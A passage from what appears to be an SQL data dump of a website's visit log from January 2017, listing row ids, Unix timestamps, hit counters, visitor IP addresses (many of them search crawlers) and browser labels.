,0,0,'91.196.178.39','chrome'),(81761,1483636162,1,1,0,0,'94.179.120.92','firefox'),(81762,1483636343,1,0,1,0,'66.249.76.27',''),(81763,1483636728,1,1,0,0,'66.102.9.25','other'),(81764,1483637014,1,1,0,0,'91.124.180.75','firefox'),(81765,1483638102,1,1,0,0,'91.124.180.75','firefox'),(81766,1483638364,1,1,0,0,'195.154.181.162','chrome'),(81767,1483638988,1,0,1,0,'66.249.76.27',''),(81768,1483639059,1,1,0,0,'207.46.13.80','other'),(81769,1483639266,1,1,0,0,'130.193.51.19','other'),(81770,1483639439,1,1,0,0,'130.193.50.34','other'),(81771,1483639494,1,0,1,0,'66.249.66.202',''),(81772,1483639789,1,0,1,0,'66.249.76.107',''),(81773,1483639910,1,0,1,0,'66.249.76.28',''),(81774,1483641023,1,1,0,0,'130.193.50.34','other'),(81775,1483641107,1,1,0,0,'141.8.183.25','other'),(81776,1483641234,1,1,0,0,'66.102.9.27','chrome'),(81777,1483641433,1,1,0,0,'185.26.180.180','other'),(81778,1483641723,1,0,1,0,'66.249.76.29',''),(81779,1483641797,1,1,0,0,'91.124.180.75','firefox'),(81780,1483641800,2,1,1,0,'66.249.76.29',''),(81781,1483643674,2,2,0,0,'130.193.51.19','other'),(81782,1483643725,2,0,2,0,'66.249.76.27',''),(81783,1483644367,1,0,1,0,'66.249.76.29',''),(81784,1483644381,1,1,0,0,'91.124.180.75','firefox'),(81785,1483644591,2,1,1,0,'66.249.76.107',''),(81786,1483644921,2,2,0,0,'130.193.50.34','other'),(81787,1483645312,2,2,0,0,'95.85.23.97','other'),(81788,1483645750,1,1,0,0,'130.193.51.19','other'),(81789,1483646113,1,1,0,0,'91.124.180.75','firefox'),(81790,1483646860,1,1,0,0,'207.46.13.80','other'),(81791,1483647163,1,1,0,0,'91.196.178.131','chrome'),(81792,1483647644,1,1,0,0,'91.124.180.75','firefox'),(81793,1483647732,2,2,0,0,'130.193.51.19','other'),(81794,1483647952,2,2,0,0,'141.8.142.61','other'),(81795,1483648073,1,0,1,0,'66.249.76.28',''),(81796,1483648145,1,1,0,0,'141.8.142.153','other'),(81797,1483648148,1,1,0,0,'141.8.132.76','other'),(81798,1483648217,1,1,0,0,'141.8.142.58','other'),(81799,1483648476,1,1,0,0,'188.32.234.10','opera'),(81800,1483648577,1,1,0,0,'178.93.138.208','other'),(81801,1483648698,1,1,0,0,'130.193.51.19','other'),(81802,1483648817,2,2,0,0,'91.124.180.75','firefox'),(81803,1483648943,1,1,0,0,'109.173.100.22','msie'),(81804,1483649372,1,1,0,0,'66.249.76.27','chrome'),(81805,1483649681,1,0,1,0,'66.249.66.188',''),(81807,1483649697,1,1,0,0,'141.8.142.58','other'),(81808,1483650358,1,1,0,0,'66.249.76.107','chrome'),(81809,1483650369,1,1,0,0,'109.173.60.201','msie'),(81810,1483650513,1,1,0,0,'141.8.183.25','other'),(81811,1483650573,1,1,0,0,'141.8.142.61','other'),(81812,1483650704,1,1,0,0,'40.77.167.14','other'),(81813,1483651032,1,1,0,0,'66.102.9.29','other'),(81814,1483651993,1,1,0,0,'95.132.134.196','chrome'),(81815,1483652004,1,1,0,0,'130.193.50.34','other'),(81816,1483652560,1,1,0,0,'130.193.51.19','other'),(81817,1483652624,1,1,0,0,'141.8.132.30','other'),(81818,1483652625,1,1,0,0,'141.0.12.155','other'),(81819,1483653470,1,1,0,0,'207.46.13.182','other'),(81820,1483653966,1,0,1,0,'66.249.76.27',''),(81821,1483654022,1,1,0,0,'141.0.13.244','other'),(81822,1483654649,1,1,0,0,'40.77.167.14','other'),(81823,1483655045,1,0,1,0,'66.249.76.108',''),(81824,1483655065,1,1,0,0,'93.74.192.252','chrome'),(81825,1483656048,1,1,0,0,'87.228.16.238','msie'),(81826,1483656768,1,1,0,0,'109.93.204.104','firefox'),(81827,1483657302,1,1,0,0,'40.77.167.14','other'),(81828,1483659047,1,0,1,0,'66.249.76.28',''),(81829,1483659095,1,0,1,0,'66.249.66.185',''),(81830,1483659242,1,1,0,0,'37.147.249.223','other'),(81831,1483660072,1,1,0,0,'207.46.13.80','other'),(81832,1483660321,1,1,0,0,'130.193.51.19','other'),(81833,1483662169,1,1,0,0,'66.249.76.108','chrome'),(81834,1483663771,1,1,0,0,'141.8.142.58','other'),(81835,1483663900,1,1,0,0,'130.193.51.19','other'),(81836,1483664663,1,0,1,0,'66.249.66.188',''),(81837,1483664932,1,1,0,0,'195.154.181.162','chrome'),(81838,1483665395,1,1,0,0,'66.102.9.27','other'),(81839,1483667183,1,1,0,0,'178.140.114.170','msie'),(81840,1483667290,1,1,0,0,'141.8.142.61','other'),(81841,1483668240,1,1,0,0,'141.8.183.19','other'),(81842,1483668285,3,3,0,0,'141.8.183.25','other'),(81843,1483668577,1,1,0,0,'130.193.50.34','other'),(81844,1483669630,1,1,0,0,'66.249.76.107','chrome'),(81845,1483669642,1,1,0,0,'66.249.66.84','chrome'),(81846,1483669911,1,1,0,0,'130.193.51.19','other'),(81847,1483670017,1,1,0,0,'141.8.183.25','other'),(81848,1483670174,1,0,1,0,'66.249.76.109',''),(81849,1483670252,1,0,1,0,'66.249.76.29',''),(81850,1483670307,1,1,0,0,'207.46.13.160','other'),(81851,1483672196,1,0,1,0,'66.249.76.27',''),(81852,1483672469,2,0,2,0,'66.249.76.28',''),(81853,1483673204,1,1,0,0,'207.46.13.80','other'),(81854,1483673877,1,1,0,0,'207.46.13.182','other'),(81855,1483674000,1,1,0,0,'108.59.8.70','other'),(81856,1483674353,1,0,1,0,'66.249.76.27',''),(81858,1483675231,1,1,0,0,'130.193.51.19','other'),(81859,1483675422,1,1,0,0,'141.8.183.25','other'),(81860,1483677695,1,1,0,0,'40.77.167.90','other'),(81861,1483677785,1,1,0,0,'180.76.15.11','other'),(81862,1483677813,1,0,1,0,'66.249.66.183',''),(81863,1483678262,1,1,0,0,'207.46.13.182','other'),(81864,1483679419,1,0,1,0,'66.249.66.180',''),(81865,1483679576,1,1,0,0,'188.32.233.46','msie'),(81866,1483679842,1,1,0,0,'66.102.9.29','other'),(81867,1483679845,2,2,0,0,'130.193.50.34','other'),(81868,1483679965,1,1,0,0,'141.8.183.25','other'),(81869,1483680597,1,1,0,0,'91.196.178.66','chrome'),(81870,1483681026,1,1,0,0,'180.76.15.150','other'),(81871,1483681199,1,1,0,0,'109.63.239.179','msie'),(81872,1483683075,1,1,0,0,'91.196.178.70','firefox'),(81873,1483683705,1,1,0,0,'176.195.96.150','msie'),(81874,1483683899,1,1,0,0,'94.179.1.196','chrome'),(81875,1483684126,1,0,1,0,'66.249.76.108',''),(81876,1483684324,1,1,0,0,'66.102.9.27','chrome'),(81877,1483684538,1,0,1,0,'66.249.66.84',''),(81878,1483685554,1,1,0,0,'94.179.28.40','firefox'),(81879,1483687228,1,1,0,0,'91.196.179.134','chrome'),(81880,1483688258,1,1,0,0,'180.76.15.140','other'),(81881,1483688300,1,0,1,0,'66.249.76.108',''),(81882,1483688450,1,1,0,0,'82.207.91.234','firefox'),(81883,1483689242,1,1,0,0,'37.204.56.120','msie'),(81884,1483689243,1,1,0,0,'91.193.81.5','firefox'),(81885,1483690155,1,1,0,0,'91.193.81.5','firefox'),(81886,1483691548,1,1,0,0,'91.196.178.66','chrome'),(81887,1483692080,1,0,1,0,'66.249.76.28',''),(81888,1483692085,1,1,0,0,'91.196.177.46','firefox'),(81889,1483692165,1,0,1,0,'66.249.76.29',''),(81890,1483693258,1,1,0,0,'91.196.177.26','chrome'),(81891,1483693399,1,1,0,0,'46.211.155.14','other'),(81892,1483693489,1,1,0,0,'91.196.178.71','firefox'),(81893,1483693785,1,1,0,0,'91.196.178.68','firefox'),(81894,1483693819,1,1,0,0,'91.124.240.232','chrome'),(81895,1483693859,1,1,0,0,'91.196.178.35','chrome'),(81896,1483695139,1,1,0,0,'91.196.178.169','chrome'),(81897,1483695327,1,0,1,0,'66.249.76.27',''),(81898,1483695373,1,0,1,0,'66.249.76.29',''),(81899,1483695785,1,0,1,0,'66.249.76.28',''),(81900,1483695788,1,1,0,0,'91.196.178.71','msie'),(81901,1483695831,1,0,1,0,'66.249.76.107',''),(81902,1483696087,1,1,0,0,'176.195.189.31','msie'),(81903,1483697036,1,1,0,0,'78.111.190.83','firefox'),(81904,1483697440,1,1,0,0,'188.32.183.160','msie'),(81905,1483697457,1,1,0,0,'91.196.178.66','firefox'),(81906,1483697676,1,1,0,0,'94.179.112.46','firefox'),(81907,1483698326,1,1,0,0,'91.196.178.70','firefox'),(81908,1483698963,2,2,0,0,'92.112.63.46','chrome'),(81909,1483698977,1,1,0,0,'91.196.178.69','firefox'),(81910,1483699469,1,1,0,0,'91.196.178.70','firefox'),(81911,1483699934,1,1,0,0,'193.194.127.217','firefox'),(81912,1483700033,1,1,0,0,'37.54.23.153','chrome'),(81913,1483701094,1,1,0,0,'79.139.165.155','opera'),(81914,1483702211,1,1,0,0,'91.213.149.93','chrome'),(81915,1483702539,1,1,0,0,'192.162.237.35','chrome'),(81916,1483702603,1,1,0,0,'37.54.23.153','chrome'),(81917,1483703395,1,1,0,0,'193.109.145.59','chrome'),(81918,1483703719,1,1,0,0,'95.220.178.64','chrome'),(81919,1483704146,1,1,0,0,'91.196.177.46','chrome'),(81920,1483704629,2,2,0,0,'37.54.19.53','firefox'),(81921,1483704680,1,1,0,0,'40.77.167.78','other'),(81922,1483705602,1,1,0,0,'37.54.19.53','firefox'),(81923,1483706334,1,1,0,0,'40.77.167.36','other'),(81924,1483706777,1,1,0,0,'91.196.177.46','chrome'),(81925,1483707927,1,1,0,0,'91.196.177.46','chrome'),(81926,1483709298,1,1,0,0,'95.135.241.143','firefox'),(81927,1483710038,1,1,0,0,'5.9.88.103','other'),(81928,1483710155,1,1,0,0,'207.46.13.30','other'),(81929,1483710282,1,1,0,0,'66.249.93.157','chrome'),(81930,1483710954,1,1,0,0,'88.81.40.184','other'),(81931,1483711609,1,1,0,0,'94.179.1.196','chrome'),(81932,1483712025,1,1,0,0,'178.92.248.99','chrome'),(81933,1483714119,1,1,0,0,'130.180.219.162','chrome'),(81934,1483714467,1,1,0,0,'46.211.145.113','chrome'),(81935,1483715063,1,1,0,0,'95.24.237.247','msie'),(81936,1483715180,1,1,0,0,'207.46.13.80','other'),(81937,1483715197,1,0,1,0,'66.249.76.107',''),(81938,1483716562,1,0,1,0,'66.249.76.27',''),(81939,1483717627,1,1,0,0,'176.14.220.173','opera'),(81940,1483718911,1,1,0,0,'37.73.193.232','chrome'),(81941,1483719586,1,1,0,0,'95.28.50.168','msie'),(81942,1483720647,1,1,0,0,'37.55.227.92','firefox'),(81943,1483721097,1,1,0,0,'130.193.50.34','other'),(81944,1483721487,1,1,0,0,'193.194.127.217','firefox'),(81945,1483721951,1,1,0,0,'180.76.15.9','other'),(81946,1483723238,1,1,0,0,'91.196.178.164','chrome'),(81947,1483723307,1,1,0,0,'66.102.9.25','other'),(81948,1483725194,1,1,0,0,'40.77.167.36','other'),(81949,1483726152,1,1,0,0,'95.158.42.244','chrome'),(81950,1483726283,1,1,0,0,'46.211.157.136','other'),(81951,1483727123,1,1,0,0,'91.196.178.166','chrome'),(81952,1483727850,1,0,1,0,'66.249.75.187',''),(81953,1483729306,1,1,0,0,'207.46.13.30','other'),(81954,1483729770,1,1,0,0,'188.32.183.160','msie'),(81955,1483729887,1,1,0,0,'91.196.178.70','firefox'),(81956,1483729901,1,1,0,0,'130.193.50.32','other'),(81957,1483730067,1,1,0,0,'77.52.180.238','chrome'),(81958,1483730424,1,0,1,0,'66.249.69.152',''),(81959,1483730866,1,1,0,0,'130.193.50.34','other'),(81960,1483733309,1,0,1,0,'66.249.75.179',''),(81961,1483733848,1,1,0,0,'207.46.13.80','other'),(81962,1483735112,1,1,0,0,'78.111.190.238','chrome'),(81963,1483735132,1,1,0,0,'207.46.13.30','other'),(81964,1483736424,1,1,0,0,'46.164.180.128','chrome'),(81965,1483737580,1,1,0,0,'66.102.9.27','other'),(81966,1483737606,5,5,0,0,'83.170.203.142','other'),(81967,1483738665,1,1,0,0,'95.133.80.82','chrome'),(81968,1483740413,1,1,0,0,'37.47.130.226','other'),(81969,1483743234,1,0,1,0,'66.249.75.183',''),(81970,1483743388,1,0,1,0,'66.249.75.187',''),(81971,1483743964,1,1,0,0,'163.172.68.121','other'),(81972,1483746187,1,1,0,0,'176.192.211.244','opera'),(81973,1483747124,1,1,0,0,'163.172.64.253','other'),(81974,1483748781,1,0,1,0,'66.249.69.152',''),(81975,1483750139,1,0,1,0,'66.249.75.179',''),(81976,1483751486,1,1,0,0,'163.172.64.199','other'),(81977,1483751914,1,1,0,0,'66.102.9.27','other'),(81978,1483753067,1,1,0,0,'141.8.142.85','other'),(81979,1483753139,3,3,0,0,'130.193.51.19','other'),(81980,1483753185,5,5,0,0,'130.193.50.34','other'),(81981,1483753217,2,2,0,0,'141.8.183.25','other'),(81982,1483753244,1,1,0,0,'178.154.189.37','other'),(81983,1483753565,1,1,0,0,'141.8.132.30','other'),(81984,1483755227,1,0,1,0,'66.249.69.149',''),(81985,1483755566,1,0,1,0,'66.249.75.187',''),(81986,1483758201,3,3,0,0,'130.193.50.34','other'),(81987,1483758241,2,2,0,0,'141.8.183.25','other'),(81988,1483758279,2,2,0,0,'130.193.51.19','other'),(81989,1483758801,1,0,1,0,'66.249.75.183',''),(81990,1483758819,1,1,0,0,'109.63.176.30','msie'),(81991,1483759942,1,0,1,0,'66.249.75.187',''),(81992,1483760295,1,1,0,0,'207.46.13.80','other'),(81993,1483761603,1,0,1,0,'66.249.75.187',''),(81994,1483768160,1,1,0,0,'163.172.64.234','other'),(81995,1483771082,2,2,0,0,'95.213.141.126','opera'),(81996,1483772486,1,0,1,0,'66.249.69.152',''),(81997,1483773299,1,0,1,0,'66.249.75.183',''),(81998,1483773721,1,0,1,0,'66.249.75.187',''),(81999,1483774286,1,0,1,0,'66.249.75.179',''),(82000,1483775944,1,0,1,0,'66.249.75.183',''),(82001,1483777767,1,1,0,0,'91.196.178.35','chrome'),(82002,1483778480,1,1,0,0,'163.172.64.186','other'),(82003,1483779033,1,1,0,0,'8.37.234.83','other'),(82004,1483779055,1,1,0,0,'94.179.225.109','other'),(82005,1483779957,1,0,1,0,'66.249.69.149',''),(82006,1483780033,1,0,1,0,'66.249.75.183',''),(82007,1483780227,1,0,1,0,'66.249.75.187',''),(82008,1483781586,1,1,0,0,'66.102.9.25','chrome'),(82009,1483783086,1,1,0,0,'40.77.167.36','other'),(82010,1483784580,1,0,1,0,'66.249.69.152',''),(82011,1483787541,1,0,1,0,'68.180.229.190',''),(82012,1483787665,2,2,0,0,'91.124.180.75','firefox'),(82013,1483787803,1,1,0,0,'40.77.167.36','other'),(82014,1483788008,1,1,0,0,'163.172.64.192','other'),(82015,1483788578,1,1,0,0,'91.124.180.75','firefox'),(82016,1483789519,3,3,0,0,'91.124.180.75','firefox'),(82017,1483789917,1,1,0,0,'83.149.126.98','other'),(82018,1483791343,1,1,0,0,'91.224.179.33','chrome'),(82019,1483791893,1,1,0,0,'130.180.217.75','chrome'),(82020,1483792838,1,0,1,0,'66.249.69.149',''),(82021,1483792946,1,1,0,0,'40.77.167.36','other'),(82022,1483793493,1,1,0,0,'66.249.75.187','chrome'),(82023,1483793631,1,1,0,0,'66.249.93.156','chrome'),(82024,1483796058,1,1,0,0,'91.124.180.75','firefox'),(82025,1483797548,1,1,0,0,'180.76.15.137','other'),(82026,1483799754,1,0,1,0,'66.249.75.179',''),(82027,1483800383,1,1,0,0,'91.196.178.97','chrome'),(82028,1483800713,1,1,0,0,'91.124.180.75','firefox'),(82029,1483801277,1,1,0,0,'217.172.17.162','chrome'),(82030,1483801425,1,1,0,0,'163.172.64.234','other'),(82031,1483803509,12,12,0,0,'66.249.69.149','chrome'),(82032,1483803588,7,7,0,0,'66.249.69.152','chrome'),(82033,1483804467,6,6,0,0,'66.249.69.155','chrome'),(82034,1483804494,7,7,0,0,'66.249.69.149','chrome'),(82035,1483804663,9,9,0,0,'66.249.69.152','chrome'),(82036,1483805377,4,4,0,0,'66.249.69.155','chrome'),(82037,1483805427,1,0,1,0,'66.249.75.179',''),(82038,1483805502,2,2,0,0,'66.249.69.149','chrome'),(82039,1483805572,2,2,0,0,'66.249.69.152','chrome'),(82040,1483806488,1,1,0,0,'163.172.64.217','other'),(82041,1483808113,1,1,0,0,'66.249.69.152','chrome'),(82042,1483808387,1,1,0,0,'82.145.223.132','other'),(82043,1483810867,1,0,1,0,'66.249.69.152',''),(82044,1483811241,2,2,0,0,'66.249.69.155','chrome'),(82045,1483811634,1,1,0,0,'95.132.135.72','chrome'),(82046,1483811651,1,1,0,0,'130.193.50.34','other'),(82047,1483812374,1,1,0,0,'66.249.69.149','chrome'),(82048,1483812621,1,1,0,0,'141.8.183.25','other'),(82049,1483814820,4,4,0,0,'66.249.75.179','chrome'),(82050,1483815057,2,2,0,0,'66.249.75.187','chrome'),(82051,1483815129,4,4,0,0,'66.249.75.183','chrome'),(82052,1483815789,4,4,0,0,'66.249.75.179','chrome'),(82053,1483815974,4,4,0,0,'66.249.75.187','chrome'),(82054,1483816226,1,1,0,0,'66.249.75.183','chrome'),(82055,1483816798,2,2,0,0,'66.249.75.179','chrome'),(82056,1483816976,8,8,0,0,'66.249.75.187','chrome'),(82057,1483817327,1,1,0,0,'37.204.156.184','msie'),(82058,1483817415,1,1,0,0,'163.172.64.253','other'),(82059,1483817572,1,1,0,0,'40.77.167.36','other'),(82060,1483817966,2,2,0,0,'66.249.75.183','chrome'),(82061,1483818704,1,1,0,0,'163.172.64.249','other'),(82062,1483819234,1,1,0,0,'163.172.64.188','other'),(82063,1483820253,1,1,0,0,'207.46.13.166','other'),(82064,1483820312,1,1,0,0,'66.249.69.149','chrome'),(82065,1483820604,2,2,0,0,'66.249.69.152','chrome'),(82066,1483820629,2,2,0,0,'88.76.247.52','other'),(82067,1483820645,1,1,0,0,'91.196.178.104','chrome'),(82068,1483821501,1,1,0,0,'141.0.13.90','other'),(82069,1483821614,2,2,0,0,'66.249.69.152','chrome'),(82070,1483821854,1,1,0,0,'66.249.69.155','chrome'),(82071,1483822080,1,1,0,0,'66.249.69.149','chrome'),(82072,1483822914,1,1,0,0,'141.0.13.90','other'),(82073,1483823585,2,2,0,0,'46.4.120.3','other'),(82074,1483824099,3,3,0,0,'66.249.69.149','chrome'),(82075,1483824459,3,3,0,0,'66.249.69.152','chrome'),(82076,1483824640,1,1,0,0,'66.249.69.155','chrome'),(82077,1483825385,1,1,0,0,'66.249.69.149','chrome'),(82078,1483825740,1,1,0,0,'66.249.75.187','chrome'),(82079,1483826531,1,1,0,0,'66.249.69.152','chrome'),(82080,1483826804,1,1,0,0,'66.249.75.187','chrome'),(82081,1483827248,1,1,0,0,'66.249.69.149','chrome'),(82082,1483827870,1,1,0,0,'66.249.75.187','chrome'),(82083,1483828112,1,1,0,0,'66.249.75.183','chrome'),(82084,1483828498,4,4,0,0,'66.249.69.149','chrome'),(82085,1483828593,1,1,0,0,'66.249.69.155','chrome'),(82086,1483828594,2,2,0,0,'66.249.69.152','chrome'),(82087,1483828969,1,1,0,0,'40.77.167.36','other'),(82088,1483829587,1,1,0,0,'66.249.69.149','chrome'),(82089,1483829788,1,1,0,0,'66.249.69.155','chrome'),(82090,1483829992,1,0,1,0,'66.249.75.183',''),(82091,1483829997,1,0,1,0,'66.249.75.179',''),(82092,1483830018,1,0,1,0,'66.249.75.187',''),(82093,1483831830,14,14,0,0,'66.249.69.149','chrome'),(82094,1483831893,5,5,0,0,'66.249.69.152','chrome'),(82095,1483831920,2,2,0,0,'66.249.75.187','chrome'),(82096,1483831924,1,1,0,0,'66.249.69.155','chrome'),(82097,1483832293,1,1,0,0,'188.163.74.45','chrome'),(82098,1483832616,1,1,0,0,'66.249.75.183','chrome'),(82099,1483832666,1,1,0,0,'207.46.13.166','other'),(82100,1483832958,1,1,0,0,'141.8.183.25','other'),(82101,1483834006,1,1,0,0,'130.193.50.34','other'),(82102,1483834294,2,1,1,0,'66.249.69.155',''),(82103,1483835728,1,1,0,0,'66.249.75.179','chrome'),(82104,1483836571,1,1,0,0,'66.249.69.152','chrome'),(82105,1483838345,1,1,0,0,'109.81.209.129','chrome'),(82106,1483838349,2,2,0,0,'109.81.209.129','other'),(82107,1483838622,1,0,1,0,'66.249.75.183',''),(82108,1483839522,1,1,0,0,'163.172.64.233','other'),(82109,1483841388,1,1,0,0,'130.193.50.34','other'),(82110,1483841742,6,0,6,0,'68.180.229.254',''),(82111,1483842035,1,1,0,0,'66.249.75.183','chrome'),(82112,1483842983,3,0,3,0,'68.180.229.254',''),(82113,1483843004,1,1,0,0,'163.172.64.254','other'),(82114,1483843711,1,0,1,0,'66.249.69.152',''),(82115,1483844015,1,1,0,0,'163.172.64.232','other'),(82116,1483846125,2,0,2,0,'68.180.229.254',''),(82117,1483846269,1,1,0,0,'163.172.64.254','other'),(82118,1483846433,1,1,0,0,'66.249.75.179','chrome'),(82119,1483847341,1,1,0,0,'66.249.69.152','chrome'),(82120,1483847542,1,0,1,0,'66.249.75.183',''),(82121,1483848129,1,0,1,0,'66.249.75.187',''),(82122,1483849478,1,1,0,0,'157.55.39.168','other'),(82123,1483851215,1,0,1,0,'66.249.69.155',''),(82124,1483852123,1,1,0,0,'62.210.162.42','chrome'),(82125,1483852361,1,0,1,0,'68.180.229.254',''),(82126,1483854449,1,1,0,0,'66.249.75.179','chrome'),(82127,1483854772,1,1,0,0,'66.249.69.152','chrome'),(82128,1483857494,1,1,0,0,'66.249.69.155','chrome'),(82129,1483858047,18,18,0,0,'95.91.12.188','other'),(82130,1483859668,1,1,0,0,'163.172.64.242','other'),(82131,1483861130,1,1,0,0,'162.210.196.100','other'),(82132,1483861387,1,0,1,0,'66.249.69.155',''),(82133,1483861846,1,1,0,0,'195.154.181.162','chrome'),(82134,1483861850,1,1,0,0,'195.154.181.15','chrome'),(82135,1483861880,1,1,0,0,'91.196.178.39','chrome'),(82136,1483861901,1,1,0,0,'157.55.39.168','other'),(82137,1483864701,1,1,0,0,'180.76.15.12','other'),(82138,1483864947,1,1,0,0,'66.249.93.155','chrome'),(82139,1483864974,1,1,0,0,'37.53.144.96','chrome'),(82140,1483864986,1,1,0,0,'130.193.50.34','other'),(82141,1483866083,1,1,0,0,'66.102.9.27','chrome'),(82142,1483866126,1,1,0,0,'91.196.178.40','firefox'),(82143,1483866871,1,1,0,0,'163.172.64.254','other'),(82144,1483867954,1,1,0,0,'91.124.182.167','firefox'),(82145,1483870188,1,1,0,0,'149.62.53.58','chrome'),(82146,1483870286,1,1,0,0,'37.115.32.227','chrome'),(82147,1483871125,1,1,0,0,'180.76.15.137','other'),(82148,1483871702,1,0,1,0,'66.249.75.187',''),(82149,1483875690,1,1,0,0,'46.211.152.188','other'),(82150,1483875798,1,1,0,0,'163.172.64.245','other'),(82151,1483875871,1,1,0,0,'141.8.142.67','other'),(82152,1483876141,1,1,0,0,'91.196.178.104','msie'),(82153,1483876838,1,1,0,0,'46.229.168.71','other'),(82154,1483876858,1,1,0,0,'46.229.168.72','other'),(82155,1483876875,1,1,0,0,'46.229.168.67','other'),(82156,1483877221,1,1,0,0,'37.204.156.184','msie'),(82157,1483877226,1,1,0,0,'163.172.64.235','other'),(82158,1483878850,1,0,1,0,'66.249.69.149',''),(82159,1483882273,1,1,0,0,'37.55.227.92','firefox'),(82160,1483882503,1,0,1,0,'66.249.69.149',''),(82161,1483882898,1,0,1,0,'66.249.75.183',''),(82162,1483884614,1,1,0,0,'78.111.185.92','chrome'),(82163,1483885517,1,0,1,0,'66.249.69.149',''),(82164,1483886177,1,1,0,0,'157.55.39.168','other'),(82165,1483886897,1,1,0,0,'163.172.64.180','other'),(82166,1483887715,1,1,0,0,'40.77.167.93','other'),(82167,1483887966,1,1,0,0,'195.154.181.15','chrome'),(82168,1483888005,1,1,0,0,'195.154.181.162','chrome'),(82169,1483889442,1,1,0,0,'93.183.227.214','msie'),(82170,1483889874,1,1,0,0,'178.219.92.77','chrome'),(82171,1483890755,1,0,1,0,'68.180.229.254',''),(82172,1483890842,1,0,1,0,'66.249.64.187',''),(82173,1483892250,1,0,1,0,'66.249.64.59',''),(82174,1483892534,1,1,0,0,'66.249.64.187','chrome'),(82175,1483894297,1,0,1,0,'66.249.64.179',''),(82176,1483896855,1,1,0,0,'78.111.189.73','chrome'),(82177,1483896879,1,1,0,0,'130.193.50.34','other'),(82178,1483896966,1,0,1,0,'66.249.64.183',''),(82179,1483898453,1,0,1,0,'66.249.64.61',''),(82180,1483901166,1,1,0,0,'91.196.178.161','chrome'),(82181,1483901592,1,0,1,0,'66.249.64.59',''),(82182,1483902004,1,1,0,0,'85.114.213.59','chrome'),(82183,1483902505,1,1,0,0,'95.10.179.84','other'),(82184,1483903292,1,1,0,0,'40.77.167.93','other'),(82185,1483904448,1,0,1,0,'66.249.64.61',''),(82186,1483905857,1,1,0,0,'130.193.50.34','other'),(82187,1483906545,1,0,1,0,'66.249.64.61',''),(82188,1483907718,1,1,0,0,'40.77.167.93','other'),(82189,1483910170,1,0,1,0,'66.249.64.59',''),(82190,1483912999,2,2,0,0,'88.198.16.153','other'),(82191,1483913553,1,0,1,0,'66.249.64.183',''),(82192,1483915004,1,0,1,0,'66.249.64.183',''),(82193,1483915332,1,0,1,0,'66.249.64.57',''),(82194,1483916234,1,1,0,0,'91.196.178.65','chrome'),(82195,1483916844,1,1,0,0,'93.74.176.187','chrome'),(82196,1483917099,4,4,0,0,'66.249.64.57','chrome'),(82197,1483917170,1,1,0,0,'207.241.225.236','other'),(82198,1483917188,1,1,0,0,'207.241.226.231','other'),(82199,1483917192,1,1,0,0,'207.241.226.215','other'),(82200,1483917371,1,1,0,0,'66.249.64.59','chrome'),(82201,1483917436,4,4,0,0,'66.249.64.61','chrome'),(82202,1483918081,4,3,1,0,'66.249.64.57',''),(82203,1483918505,1,1,0,0,'66.249.64.61','chrome'),(82204,1483918696,1,1,0,0,'40.77.167.3','other'),(82205,1483919136,1,1,0,0,'66.249.64.57','chrome'),(82206,1483919883,1,0,1,0,'66.249.64.187',''),(82207,1483920081,1,1,0,0,'180.76.15.157','other'),(82208,1483920262,1,1,0,0,'141.8.183.25','other'),(82209,1483920990,1,1,0,0,'66.249.64.59','chrome'),(82210,1483921511,1,1,0,0,'66.249.64.61','chrome'),(82211,1483922220,2,0,2,0,'68.180.229.254',''),(82212,1483923062,1,1,0,0,'163.172.64.180','other'),(82213,1483923148,1,1,0,0,'66.249.64.57','chrome'),(82214,1483924651,3,0,3,0,'68.180.229.254',''),(82215,1483924663,1,1,0,0,'180.76.15.134','other'),(82216,1483925063,1,1,0,0,'130.193.51.19','other'),(82217,1483925104,1,1,0,0,'163.172.64.182','other'),(82218,1483926239,4,4,0,0,'62.210.162.42','chrome'),(82219,1483926403,4,4,0,0,'66.249.64.183','chrome'),(82220,1483926471,4,4,0,0,'66.249.64.187','chrome'),(82221,1483926589,17,17,0,0,'66.249.64.179','chrome'),(82222,1483927335,3,2,1,0,'66.249.64.183',''),(82223,1483927381,2,1,1,0,'66.249.64.187',''),(82224,1483927551,1,1,0,0,'157.55.39.143','other'),(82225,1483928476,2,2,0,0,'66.249.64.61','chrome'),(82226,1483929005,1,1,0,0,'40.77.167.3','other'),(82227,1483929681,1,0,1,0,'66.249.64.57',''),(82228,1483929899,1,1,0,0,'163.172.64.225','other'),(82229,1483930056,1,1,0,0,'66.249.64.61','chrome'),(82230,1483930100,1,1,0,0,'52.86.176.3','other'),(82231,1483930380,1,0,1,0,'68.180.229.254',''),(82232,1483932989,1,1,0,0,'180.76.15.160','other'),(82233,1483933862,1,1,0,0,'66.249.64.59','chrome'),(82234,1483934947,1,1,0,0,'66.249.64.61','chrome'),(82235,1483935134,1,1,0,0,'66.249.64.59','chrome'),(82236,1483935590,1,0,1,0,'66.249.64.183',''),(82237,1483935830,1,1,0,0,'180.76.15.145','other'),(82238,1483936522,1,1,0,0,'66.249.64.57','chrome'),(82239,1483936616,2,2,0,0,'66.249.64.59','chrome'),(82240,1483936839,3,3,0,0,'66.249.64.61','chrome'),(82241,1483937002,1,1,0,0,'207.46.13.1','other'),(82242,1483937026,1,0,1,0,'66.249.64.183',''),(82243,1483937269,1,1,0,0,'163.172.64.251','other'),(82244,1483938614,1,1,0,0,'66.249.64.59','chrome'),(82245,1483940046,1,1,0,0,'66.249.64.61','chrome'),(82246,1483940180,5,5,0,0,'66.249.64.57','chrome'),(82247,1483940287,3,3,0,0,'66.249.64.59','chrome'),(82248,1483941291,1,1,0,0,'163.172.64.178','other'),(82249,1483941344,1,1,0,0,'66.249.64.61','chrome'),(82250,1483941776,2,2,0,0,'66.249.64.57','chrome'),(82251,1483941784,1,1,0,0,'66.249.64.59','chrome'),(82252,1483942838,1,0,1,0,'66.249.64.183',''),(82253,1483944306,1,0,1,0,'66.249.64.179',''),(82254,1483944875,1,1,0,0,'108.59.8.70','other'),(82255,1483945122,1,0,1,0,'66.249.64.59',''),(82256,1483945281,1,1,0,0,'37.55.104.74','chrome'),(82257,1483945770,1,1,0,0,'207.46.13.1','other'),(82258,1483946578,1,1,0,0,'66.102.9.29','chrome'),(82259,1483946591,1,1,0,0,'91.196.178.71','chrome'),(82260,1483946965,1,1,0,0,'66.249.64.57','chrome'),(82261,1483947009,5,5,0,0,'51.255.173.1','other'),(82262,1483947299,1,1,0,0,'163.172.64.242','other'),(82263,1483947436,1,1,0,0,'130.193.50.34','other'),(82264,1483948897,1,1,0,0,'66.249.64.179','chrome'),(82265,1483949265,1,1,0,0,'40.77.167.3','other'),(82266,1483949398,1,1,0,0,'141.8.183.25','other'),(82267,1483950075,1,1,0,0,'91.196.178.40','firefox'),(82268,1483951071,1,1,0,0,'66.249.